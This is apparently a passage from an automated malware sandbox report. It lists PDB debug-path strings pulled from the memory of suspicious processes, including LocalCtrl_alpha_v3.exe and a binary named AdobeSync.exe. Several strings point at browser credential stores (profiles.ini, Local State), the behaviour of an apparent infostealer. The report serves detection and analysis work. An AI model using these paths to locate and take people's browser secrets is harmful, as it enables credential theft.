LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbM source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniG source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831y source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Z\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\6 source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SharePoint.pdb source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniC source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: p\Symbols\ntkrnlmp.pdbX source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniw source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbH source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: zC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbo source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: zC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AXE8SharedExpat.pdbpp5m source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ininix source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831p source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Temp\Symbols\ntkrnlmp.pdb< source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: LVkAi4PBv6.exe, 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000000.00000000.1353994334.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp, LVkAi4PBv6.exe, 00000002.00000000.1358153893.000000000060B000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdbo source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: <\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbs source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831p source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: _prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843250003.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1947218705.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: q\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: `C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb717 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AdobeCollabSync.pdb source: AdobeSync.exe, 00000003.00000002.1388149267.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000000.1362863550.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000003.1382607094.0000000001307000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000000.1387754147.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp, AdobeSync.exe, 00000004.00000002.1449776370.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini3 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 3C:\Users\user\AppData\Roaming\Adobe\ols\winload_prod.pdb) source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: krnlmp.pdbF source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2185087878.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208560942.0000000002E1A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2186340967.0000000002E19000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb` source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AXE8SharedExpat.pdb source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp, AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: 4C:\Users\user\AppData\Roaming\com.adobe.dunamis_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: AXE8SharedExpat.pdbppPm source: AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: LVkAi4PBv6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
